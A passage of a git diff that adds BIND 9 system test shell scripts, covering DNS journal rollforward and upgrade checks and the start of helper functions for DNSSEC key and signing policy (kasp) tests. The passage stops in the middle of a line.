regarding copyright ownership. + +. ../conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +cp ns1/generic.db.in ns1/changed.db +cp ns1/changed.ver1.jnl.saved ns1/changed.db.jnl + +cp ns1/generic.db.in ns1/unchanged.db +cp ns1/unchanged.ver1.jnl.saved ns1/unchanged.db.jnl + +cp ns1/generic.db.in ns1/changed2.db +cp ns1/changed.ver2.jnl.saved ns1/changed2.db.jnl + +cp ns1/generic.db.in ns1/unchanged2.db +cp ns1/unchanged.ver2.jnl.saved ns1/unchanged2.db.jnl + +cp ns1/ixfr.db.in ns1/ixfr.db +cp ns1/ixfr.ver1.jnl.saved ns1/ixfr.db.jnl + +cp ns1/generic.db.in ns1/d1212.db +cp ns1/d1212.jnl.saved ns1/d1212.db.jnl + +cp ns1/generic.db.in ns1/d2121.db +cp ns1/d2121.jnl.saved ns1/d2121.db.jnl + +cp ns1/generic.db.in ns1/maxjournal.db +cp ns1/maxjournal.jnl.saved ns1/maxjournal.db.jnl + +cp ns1/generic.db.in ns1/maxjournal2.db +cp ns1/maxjournal2.jnl.saved ns1/maxjournal2.db.jnl + +cp ns1/managed-keys.bind.in ns1/managed-keys.bind +$PERL ../fromhex.pl < ns1/managed-keys.bind.jnl.in > ns1/managed-keys.bind.jnl + +copy_setports ns2/named.conf.in ns2/named.conf +cp ns2/managed-keys.bind.in ns2/managed-keys.bind +cp ns2/managed-keys.bind.jnl.in ns2/managed-keys.bind.jnl diff --git a/bin/tests/system/journal/tests.sh b/bin/tests/system/journal/tests.sh new file mode 100644 index 0000000..f6e0f4d --- /dev/null +++ b/bin/tests/system/journal/tests.sh @@ -0,0 +1,255 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. ../conf.sh + +dig_with_opts() { + "$DIG" @10.53.0.1 -p "$PORT" +tcp "$@" +} + +rndc_with_opts() { + "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@" +} + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "check outdated journal rolled forward (dynamic) ($n)" +ret=0 +dig_with_opts changed soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010902' dig.out.test$n > /dev/null || ret=1 +grep 'zone changed/IN: journal rollforward completed successfully using old journal format' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated empty journal did not cause an error (dynamic) ($n)" +ret=0 +dig_with_opts unchanged soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010901' dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated journals were updated or removed (dynamic) ($n)" +ret=0 +cat -v ns1/changed.db.jnl | grep "BIND LOG V9.2" > /dev/null || ret=1 +[ -f ns1/unchanged.db.jnl ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check updated journal has correct RR count (dynamic) ($n)" +ret=0 +$JOURNALPRINT -x ns1/changed.db.jnl | grep "rrcount 3 " > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check new-format journal rolled forward (dynamic) ($n)" +ret=0 +dig_with_opts changed2 soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010902' dig.out.test$n > /dev/null || ret=1 +grep 'zone changed2/IN: journal rollforward completed successfully: success' ns1/named.run > /dev/null || ret=1 +grep 'zone changed2/IN: journal rollforward completed successfully using old journal format' ns1/named.run > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check new-format empty journal did not cause error (dynamic) ($n)" +ret=0 +dig_with_opts unchanged2 soa > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010901' dig.out.test$n > /dev/null || ret=1 +grep 'zone unchanged2/IN: journal rollforward completed successfully' ns1/named.run > /dev/null && ret=1 +grep 'zone unchanged2/IN: journal rollforward completed successfully using old journal format' ns1/named.run > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check new-format journals were updated or removed (dynamic) ($n)" +ret=0 +cat -v ns1/changed2.db.jnl | grep "BIND LOG V9.2" > /dev/null || ret=1 +[ -f ns1/unchanged2.db.jnl ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated up-to-date journal succeeded (ixfr-from-differences) ($n)" +ret=0 +dig_with_opts -t soa ixfr > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010902' dig.out.test$n > /dev/null || ret=1 +grep 'zone ixfr/IN: journal rollforward completed successfully using old journal format: up to date' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check outdated journal was updated (ixfr-from-differences) ($n)" +ret=0 +cat -v ns1/ixfr.db.jnl | grep "BIND LOG V9.2" > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers succeeded (version 1,2,1,2) ($n)" +ret=0 +dig_with_opts -t soa hdr1d1d2d1d2 > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010905' dig.out.test$n > /dev/null || ret=1 +grep 'zone hdr1d1d2d1d2/IN: journal rollforward completed successfully using old journal format: success' ns1/named.run > /dev/null || ret=1 +grep 'zone_journal_compact: zone hdr1d1d2d1d2/IN: repair full journal' ns1/named.run > /dev/null || ret=1 +grep 'hdr1d1d2d1d2/IN: dns_journal_compact: success' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers was updated (version 1,2,1,2) ($n)" +ret=0 +[ $($JOURNALPRINT -x ns1/d1212.jnl.saved | grep -c "version 1") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d1212.jnl.saved | grep -c "version 2") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d1212.db.jnl | grep -c "version 1") -eq 0 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d1212.db.jnl | grep -c "version 2") -eq 4 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers succeeded (version 2,1,2,1) ($n)" +ret=0 +dig_with_opts -t soa hdr1d2d1d2d1 > dig.out.test$n +grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1 +grep '2012010905' dig.out.test$n > /dev/null || ret=1 +grep 'zone hdr1d2d1d2d1/IN: journal rollforward completed successfully using old journal format: success' ns1/named.run > /dev/null || ret=1 +grep 'zone_journal_compact: zone hdr1d2d1d2d1/IN: repair full journal' ns1/named.run > /dev/null || ret=1 +grep 'zone hdr1d2d1d2d1/IN: dns_journal_compact: success' ns1/named.run > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal with mixed headers was updated (version 2,1,2,1) ($n)" +ret=0 +[ $($JOURNALPRINT -x ns1/d2121.jnl.saved | grep -c "version 1") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d2121.jnl.saved | grep -c "version 2") -eq 2 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d2121.db.jnl | grep -c "version 1") -eq 0 ] || ret=1 +[ $($JOURNALPRINT -x ns1/d2121.db.jnl | grep -c "version 2") -eq 4 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check there are no journals left un-updated ($n)" +ret=0 +c1=$(cat -v ns1/*.jnl | grep -c "BIND LOG V9") +c2=$(cat -v ns1/*.jnl | grep -c "BIND LOG V9.2") +[ ${c1} -eq ${c2} ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check that journal with mixed headers can be compacted (version 1,2,1,2) ($n)" +ret=0 +journal=ns1/d1212.jnl.saved +seriallist=$($JOURNALPRINT -x $journal | awk '$1 == "Transaction:" { print $11 }') +for serial in $seriallist +do + cp $journal tmp.jnl + $JOURNALPRINT -c $serial tmp.jnl || ret=1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check that journal with mixed headers can be compacted (version 2,1,2,1) ($n)" +ret=0 +journal=ns1/d2121.jnl.saved +seriallist=$($JOURNALPRINT -x $journal | awk '$1 == "Transaction:" { print $11 }') +for serial in $seriallist +do + cp ns1/d1212.jnl.saved tmp.jnl + $JOURNALPRINT -c $serial tmp.jnl || ret=1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check upgrade of managed-keys.bind.jnl succeeded($n)" +ret=0 +$JOURNALPRINT ns1/managed-keys.bind.jnl > journalprint.out.test$n +lines=$(awk '$1 == "add" && $5 == "SOA" && $8 == "3297" { print }' journalprint.out.test$n | wc -l) +test $lines -eq 1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal downgrade/upgrade ($n)" +ret=0 +cp ns1/changed.db.jnl ns1/temp.jnl +$JOURNALPRINT -d ns1/temp.jnl +[ $($JOURNALPRINT -x ns1/temp.jnl | grep -c "version 1") -eq 1 ] || ret=1 +$JOURNALPRINT -x ns1/temp.jnl | grep -q "Header version = 1" || ret=1 +$JOURNALPRINT -u ns1/temp.jnl +$JOURNALPRINT -x ns1/temp.jnl | grep -q "Header version = 2" || ret=1 +[ $($JOURNALPRINT -x ns1/temp.jnl | grep -c "version 2") -eq 1 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check max-journal-size works after journal update ($n)" +ret=0 +# journal was repaired, it should still be big +[ $(wc -c < ns1/maxjournal.db.jnl) -gt 12000 ] || ret=1 +# the zone hasn't been dumped yet, so 'rndc sync' should work without +# needing a zone update first. +rndc_with_opts 10.53.0.1 sync maxjournal +check_size() ( + [ $(wc -c < ns1/maxjournal.db.jnl) -lt 4000 ] +) +retry_quiet 10 check_size || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check max-journal-size works with non-updated journals ($n)" +ret=0 +# journal was not repaired, so it should still be big +[ $(wc -c < ns1/maxjournal2.db.jnl) -gt 12000 ] || ret=1 +# the zone hasn't been dumped yet, so 'rndc sync' should work without +# needing a zone update first. +rndc_with_opts 10.53.0.1 sync maxjournal2 +check_size() ( + [ $(wc -c < ns1/maxjournal2.db.jnl) -lt 4000 ] +) +retry_quiet 10 check_size || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check journal index consistency ($n)" +ret=0 +for jnl in ns1/*.jnl; do + $JOURNALPRINT -x $jnl 2>&1 | grep -q "Offset mismatch" && ret=1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that journal is applied to zone with keydata placeholder record" +ret=0 +grep 'managed-keys-zone: journal rollforward completed successfully: up to date' ns2/named.run > /dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/kasp.sh b/bin/tests/system/kasp.sh new file mode 100644 index 0000000..d49baa3 --- /dev/null +++ b/bin/tests/system/kasp.sh @@ -0,0 +1,1238 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Common configuration data for kasp system tests, to be sourced into +# other shell scripts. +# + +# shellcheck source=conf.sh +. ../conf.sh + +############################################################################### +# Constants # +############################################################################### +DEFAULT_TTL=300 + +############################################################################### +# Query properties # +############################################################################### +TSIG="" +SHA1="FrSt77yPTFx6hTs4i2tKLB9LmE0=" +SHA224="hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA==" +SHA256="R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY=" +VIEW1="YPfMoAk6h+3iN8MDRQC004iSNHY=" +VIEW2="4xILSZQnuO1UKubXHkYUsvBRPu8=" +VIEW3="C1Azf+gGPMmxrUg/WQINP6eV9Y0=" + +############################################################################### +# Key properties # +############################################################################### +# ID +# BASEFILE +# EXPECT +# ROLE +# KSK +# ZSK +# FLAGS +# LIFETIME +# ALG_NUM +# ALG_STR +# ALG_LEN +# CREATED +# PUBLISHED +# ACTIVE +# RETIRED +# REVOKED +# REMOVED +# GOAL +# STATE_DNSKEY +# STATE_ZRRSIG +# STATE_KRRSIG +# STATE_DS +# EXPECT_ZRRSIG +# EXPECT_KRRSIG +# LEGACY +# PRIVATE +# PRIVKEY_STAT +# PUBKEY_STAT +# STATE_STAT + +key_key() { + echo "${1}__${2}" +} + +key_get() { + eval "echo \${$(key_key "$1" "$2")}" +} + +key_set() { + eval "$(key_key "$1" "$2")='$3'" +} + +key_stat() { + $PERL -e 'print((stat @ARGV[0])[9] . "\n");' "$1" +} + +# Save certain values in the KEY array. +key_save() +{ + # Save key id. + key_set "$1" ID "$KEY_ID" + # Save base filename. + key_set "$1" BASEFILE "$BASE_FILE" + # Save creation date. + key_set "$1" CREATED "${KEY_CREATED}" + # Save key change time. + key_set "$1" PRIVKEY_STAT $(key_stat "${BASE_FILE}.private") + key_set "$1" PUBKEY_STAT $(key_stat "${BASE_FILE}.key") + key_set "$1" STATE_STAT $(key_stat "${BASE_FILE}.state") +} + +# Clear key state. +# +# This will update either the KEY1, KEY2, or KEY3 array. +key_clear() { + key_set "$1" "ID" 'no' + key_set "$1" "IDPAD" 'no' + key_set "$1" "EXPECT" 'no' + key_set "$1" "ROLE" 'none' + key_set "$1" "KSK" 'no' + key_set "$1" "ZSK" 'no' + key_set "$1" "FLAGS" '0' + key_set "$1" "LIFETIME" 'none' + key_set "$1" "ALG_NUM" '0' + key_set "$1" "ALG_STR" 'none' + key_set "$1" "ALG_LEN" '0' + key_set "$1" "CREATED" '0' + key_set "$1" "PUBLISHED" 'none' + key_set "$1" "SYNCPUBLISH" 'none' + key_set "$1" "ACTIVE" 'none' + key_set "$1" "RETIRED" 'none' + key_set "$1" "REVOKED" 'none' + key_set "$1" "REMOVED" 'none' + key_set "$1" "GOAL" 'none' + key_set "$1" "STATE_DNSKEY" 'none' + key_set "$1" "STATE_KRRSIG" 'none' + key_set "$1" "STATE_ZRRSIG" 'none' + key_set "$1" "STATE_DS" 'none' + key_set "$1" "EXPECT_ZRRSIG" 'no' + key_set "$1" "EXPECT_KRRSIG" 'no' + key_set "$1" "LEGACY" 'no' + key_set "$1" "PRIVATE" 'yes' + key_set "$1" "PRIVKEY_STAT" '0' + key_set "$1" "PUBKEY_STAT" '0' + key_set "$1" "STATE_STAT" '0' +} + +# Start clear. +# There can be at most 4 keys at the same time during a rollover: +# 2x KSK, 2x ZSK +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +############################################################################### +# Utilities # +############################################################################### + +# Call dig with default options. +_dig_with_opts() { + + if [ -n "$TSIG" ]; then + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" -y "$TSIG" "$@" + else + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" + fi +} + +# RNDC. +_rndccmd() { + "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@" +} + +# Print IDs of keys used for generating RRSIG records for RRsets of type $1 +# found in dig output file $2. +get_keys_which_signed() { + _qtype=$1 + _output=$2 + # The key ID is the 11th column of the RRSIG record line. + awk -v qt="$_qtype" '$4 == "RRSIG" && $5 == qt {print $11}' < "$_output" +} + +# Get the key ids from key files for zone $2 in directory $1. +get_keyids() { + _dir=$1 + _zone=$2 + _regex="K${_zone}.+*+*.key" + + find "${_dir}" -mindepth 1 -maxdepth 1 -name "${_regex}" | sed "s,$_dir/K${_zone}.+\([0-9]\{3\}\)+\([0-9]\{5\}\).key,\2," +} + +# By default log errors and don't quit immediately. +_log=1 +_log_error() { + test $_log -eq 1 && echo_i "error: $1" + ret=$((ret+1)) +} +disable_logerror() { + _log=0 +} +enable_logerror() { + _log=1 +} + +# Set server key-directory ($1) and address ($2) for testing keys. +set_server() { + DIR=$1 + SERVER=$2 +} +# Set zone name for testing keys. +set_zone() { + ZONE=$1 + DYNAMIC="no" +} +# By default zones are considered static. +# When testing dynamic zones, call 'set_dynamic' after 'set_zone'. +set_dynamic() { + DYNAMIC="yes" +} + +# Set policy settings (name $1, number of keys $2, dnskey ttl $3) for testing keys. +set_policy() { + POLICY=$1 + NUM_KEYS=$2 + DNSKEY_TTL=$3 + CDS_DELETE="no" +} +# By default policies are considered to be secure. +# If a zone sets its policy to "insecure", call 'set_cdsdelete' to tell the +# system test to expect a CDS and CDNSKEY Delete record. +set_cdsdelete() { + CDS_DELETE="yes" +} + +# Set key properties for testing keys. +# $1: Key to update (KEY1, KEY2, ...) +# $2: Value +set_keyrole() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "ROLE" "$2" + key_set "$1" "KSK" "no" + key_set "$1" "ZSK" "no" + key_set "$1" "FLAGS" "0" + + test "$2" = "ksk" && key_set "$1" "KSK" "yes" + test "$2" = "ksk" && key_set "$1" "FLAGS" "257" + + test "$2" = "zsk" && key_set "$1" "ZSK" "yes" + test "$2" = "zsk" && key_set "$1" "FLAGS" "256" + + test "$2" = "csk" && key_set "$1" "KSK" "yes" + test "$2" = "csk" && key_set "$1" "ZSK" "yes" + test "$2" = "csk" && key_set "$1" "FLAGS" "257" +} +set_keylifetime() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "LIFETIME" "$2" +} +# The algorithm value consists of three parts: +# $2: Algorithm (number) +# $3: Algorithm (string-format) +# $4: Algorithm length +set_keyalgorithm() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "ALG_NUM" "$2" + key_set "$1" "ALG_STR" "$3" + key_set "$1" "ALG_LEN" "$4" +} +set_keysigning() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "EXPECT_KRRSIG" "$2" +} +set_zonesigning() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "EXPECT_ZRRSIG" "$2" +} + +# Set key timing metadata. Set to "none" to unset. +# $1: Key to update (KEY1, KEY2, ...) +# $2: Time to update (PUBLISHED, SYNCPUBLISH, ACTIVE, RETIRED, REVOKED, or REMOVED). +# $3: Value +set_keytime() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "$2" "$3" +} + +# Set key timing metadata to a value plus additional time. +# $1: Key to update (KEY1, KEY2, ...) +# $2: Time to update (PUBLISHED, SYNCPUBLISH, ACTIVE, RETIRED, REVOKED, or REMOVED). +# $3: Value +# $4: Additional time. +set_addkeytime() { + if [ -x "$PYTHON" ]; then + # Convert "%Y%m%d%H%M%S" format to epoch seconds. + # Then, add the additional time (can be negative). + _value=$3 + _plus=$4 + $PYTHON > python.out.$ZONE.$1.$2 <<EOF +from datetime import datetime +from datetime import timedelta +_now = datetime.strptime("$_value", "%Y%m%d%H%M%S") +_delta = timedelta(seconds=$_plus) +_then = _now + _delta +print(_then.strftime("%Y%m%d%H%M%S")); +EOF + # Set the expected timing metadata. + key_set "$1" "$2" $(cat python.out.$ZONE.$1.$2) + fi +} + +# Set key state metadata. Set to "none" to unset. +# $1: Key to update (KEY1, KEY2, ...) +# $2: Key state to update (GOAL, STATE_DNSKEY, STATE_ZRRSIG, STATE_KRRSIG, or STATE_DS) +# $3: Value +set_keystate() { + key_set "$1" "EXPECT" "yes" + key_set "$1" "$2" "$3" +} + +# Check the key $1 with id $2. +# This requires environment variables to be set. +# +# This will set the following environment variables for testing: +# BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" +# KEY_FILE="${BASE_FILE}.key" +# PRIVATE_FILE="${BASE_FILE}.private" +# STATE_FILE="${BASE_FILE}.state" +# KEY_ID=$(echo $1 | sed 's/^0\{0,4\}//') +# KEY_CREATED (from the KEY_FILE) +check_key() { + _dir="$DIR" + _zone="$ZONE" + _role=$(key_get "$1" ROLE) + _key_idpad="$2" + _key_id=$(echo "$_key_idpad" | sed 's/^0\{0,4\}//') + _alg_num=$(key_get "$1" ALG_NUM) + _alg_numpad=$(printf "%03d" "$_alg_num") + _alg_string=$(key_get "$1" ALG_STR) + _length=$(key_get "$1" "ALG_LEN") + _dnskey_ttl="$DNSKEY_TTL" + _lifetime=$(key_get "$1" LIFETIME) + _legacy=$(key_get "$1" LEGACY) + _private=$(key_get "$1" PRIVATE) + _flags=$(key_get "$1" FLAGS) + + _published=$(key_get "$1" PUBLISHED) + _active=$(key_get "$1" ACTIVE) + _retired=$(key_get "$1" RETIRED) + _revoked=$(key_get "$1" REVOKED) + _removed=$(key_get "$1" REMOVED) + + _goal=$(key_get "$1" GOAL) + _state_dnskey=$(key_get "$1" STATE_DNSKEY) + _state_zrrsig=$(key_get "$1" STATE_ZRRSIG) + _state_krrsig=$(key_get "$1" STATE_KRRSIG) + _state_ds=$(key_get "$1" STATE_DS) + + _ksk="no" + _zsk="no" + if [ "$_role" = "ksk" ]; then + _ksk="yes" + elif [ "$_role" = "zsk" ]; then + _zsk="yes" + elif [ "$_role" = "csk" ]; then + _zsk="yes" + _ksk="yes" + fi + + _role2="none" + if [ "$_flags" = "257" ]; then + _role2="key-signing" + elif [ "$_flags" = "256" ]; then + _role2="zone-signing" + fi + + BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" + KEY_FILE="${BASE_FILE}.key" + PRIVATE_FILE="${BASE_FILE}.private" + STATE_FILE="${BASE_FILE}.state" + KEY_ID="${_key_id}" + + # Check file existence. + [ -s "$KEY_FILE" ] || ret=1 + if [ "$_private" = "yes" ]; then + [ -s "$PRIVATE_FILE" ] || ret=1 + fi + if [ "$_legacy" = "no" ]; then + [ -s "$STATE_FILE" ] || ret=1 + fi + [ "$ret" -eq 0 ] || _log_error "${BASE_FILE} files missing" + [ "$ret" -eq 0 ] || return + + # Retrieve creation date. + grep "; Created:" "$KEY_FILE" > "${ZONE}.${KEY_ID}.${_alg_num}.created" || _log_error "mismatch created comment in $KEY_FILE" + KEY_CREATED=$(awk '{print $3}' < "${ZONE}.${KEY_ID}.${_alg_num}.created") + + if [ "$_private" = "yes" ]; then + grep "Created: ${KEY_CREATED}" "$PRIVATE_FILE" > /dev/null || _log_error "mismatch created in $PRIVATE_FILE" + fi + if [ "$_legacy" = "no" ]; then + grep "Generated: ${KEY_CREATED}" "$STATE_FILE" > /dev/null || _log_error "mismatch generated in $STATE_FILE" + fi + + test $_log -eq 1 && echo_i "check key file $BASE_FILE" + + # Check the public key file. + grep "This is a ${_role2} key, keyid ${_key_id}, for ${_zone}." "$KEY_FILE" > /dev/null || _log_error "mismatch top comment in $KEY_FILE" + grep "${_zone}\. ${_dnskey_ttl} IN DNSKEY ${_flags} 3 ${_alg_num}" "$KEY_FILE" > /dev/null || _log_error "mismatch DNSKEY record in $KEY_FILE" + # Now check the private key file. + if [ "$_private" = "yes" ]; then + grep "Private-key-format: v1.3" "$PRIVATE_FILE" > /dev/null || _log_error "mismatch private key format in $PRIVATE_FILE" + grep "Algorithm: ${_alg_num} (${_alg_string})" "$PRIVATE_FILE" > /dev/null || _log_error "mismatch algorithm in $PRIVATE_FILE" + fi + # Now check the key state file. + if [ "$_legacy" = "no" ]; then + grep "This is the state of key ${_key_id}, for ${_zone}." "$STATE_FILE" > /dev/null || _log_error "mismatch top comment in $STATE_FILE" + if [ "$_lifetime" = "none" ]; then + grep "Lifetime: " "$STATE_FILE" > /dev/null && _log_error "unexpected lifetime in $STATE_FILE" + else + grep "Lifetime: ${_lifetime}" "$STATE_FILE" > /dev/null || _log_error "mismatch lifetime in $STATE_FILE" + fi + grep "Algorithm: ${_alg_num}" "$STATE_FILE" > /dev/null || _log_error "mismatch algorithm in $STATE_FILE" + grep "Length: ${_length}" "$STATE_FILE" > /dev/null || _log_error "mismatch length in $STATE_FILE" + grep "KSK: ${_ksk}" "$STATE_FILE" > /dev/null || _log_error "mismatch ksk in $STATE_FILE" + grep "ZSK: ${_zsk}" "$STATE_FILE" > /dev/null || _log_error "mismatch zsk in $STATE_FILE" + + # Check key states. + if [ "$_goal" = "none" ]; then + grep "GoalState: " "$STATE_FILE" > /dev/null && _log_error "unexpected goal state in $STATE_FILE" + else + grep "GoalState: ${_goal}" "$STATE_FILE" > /dev/null || _log_error "mismatch goal state in $STATE_FILE" + fi + + if [ "$_state_dnskey" = "none" ]; then + grep "DNSKEYState: " "$STATE_FILE" > /dev/null && _log_error "unexpected dnskey state in $STATE_FILE" + grep "DNSKEYChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected dnskey change in $STATE_FILE" + else + grep "DNSKEYState: ${_state_dnskey}" "$STATE_FILE" > /dev/null || _log_error "mismatch dnskey state in $STATE_FILE" + grep "DNSKEYChange: " "$STATE_FILE" > /dev/null || _log_error "mismatch dnskey change in $STATE_FILE" + fi + + if [ "$_state_zrrsig" = "none" ]; then + grep "ZRRSIGState: " "$STATE_FILE" > /dev/null && _log_error "unexpected zrrsig state in $STATE_FILE" + grep "ZRRSIGChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected zrrsig change in $STATE_FILE" + else + grep "ZRRSIGState: ${_state_zrrsig}" "$STATE_FILE" > /dev/null || _log_error "mismatch zrrsig state in $STATE_FILE" + grep "ZRRSIGChange: " "$STATE_FILE" > /dev/null || _log_error "mismatch zrrsig change in $STATE_FILE" + fi + + if [ "$_state_krrsig" = "none" ]; then + grep "KRRSIGState: " "$STATE_FILE" > /dev/null && _log_error "unexpected krrsig state in $STATE_FILE" + grep "KRRSIGChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected krrsig change in $STATE_FILE" + else + grep "KRRSIGState: ${_state_krrsig}" "$STATE_FILE" > /dev/null || _log_error "mismatch krrsig state in $STATE_FILE" + grep "KRRSIGChange: " "$STATE_FILE" > /dev/null || _log_error "mismatch krrsig change in $STATE_FILE" + fi + + if [ "$_state_ds" = "none" ]; then + grep "DSState: " "$STATE_FILE" > /dev/null && _log_error "unexpected ds state in $STATE_FILE" + grep "DSChange: " "$STATE_FILE" > /dev/null && _log_error "unexpected ds change in $STATE_FILE" + else + grep "DSState: ${_state_ds}" "$STATE_FILE" > /dev/null || _log_error "mismatch ds state in $STATE_FILE" + grep "DSChange: " "$STATE_FILE" > /dev/null || _log_error "mismatch ds change in $STATE_FILE" + fi + fi +} + +# Check the key timing metadata for key $1. +check_timingmetadata() { + _dir="$DIR" + _zone="$ZONE" + _key_idpad=$(key_get "$1" ID) + _key_id=$(echo "$_key_idpad" | sed 's/^0\{0,4\}//') + _alg_num=$(key_get "$1" ALG_NUM) + _alg_numpad=$(printf "%03d" "$_alg_num") + + _published=$(key_get "$1" PUBLISHED) + _active=$(key_get "$1" ACTIVE) + _retired=$(key_get "$1" RETIRED) + _revoked=$(key_get "$1" REVOKED) + _removed=$(key_get "$1" REMOVED) + + _goal=$(key_get "$1" GOAL) + _state_dnskey=$(key_get "$1" STATE_DNSKEY) + _state_zrrsig=$(key_get "$1" STATE_ZRRSIG) + _state_krrsig=$(key_get "$1" STATE_KRRSIG) + _state_ds=$(key_get "$1" STATE_DS) + + _base_file=$(key_get "$1" BASEFILE) + _key_file="${_base_file}.key" + _private_file="${_base_file}.private" + _state_file="${_base_file}.state" + _legacy=$(key_get "$1" LEGACY) + _private=$(key_get "$1" PRIVATE) + + _published=$(key_get "$1" PUBLISHED) + _syncpublish=$(key_get "$1" SYNCPUBLISH) + _active=$(key_get "$1" ACTIVE) + _retired=$(key_get "$1" RETIRED) + _revoked=$(key_get "$1" REVOKED) + _removed=$(key_get "$1" REMOVED) + + # Check timing metadata. + n=$((n+1)) + echo_i "check key timing metadata for key $1 id ${_key_id} zone ${ZONE} ($n)" + ret=0 + + if [ "$_published" = "none" ]; then + grep "; Publish:" "${_key_file}" > /dev/null && _log_error "unexpected publish comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Publish:" "${_private_file}" > /dev/null && _log_error "unexpected publish in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Published: " "${_state_file}" > /dev/null && _log_error "unexpected publish in ${_state_file}" + fi + else + grep "; Publish: $_published" "${_key_file}" > /dev/null || _log_error "mismatch publish comment in ${_key_file} (expected ${_published})" + if [ "$_private" = "yes" ]; then + grep "Publish: $_published" "${_private_file}" > /dev/null || _log_error "mismatch publish in 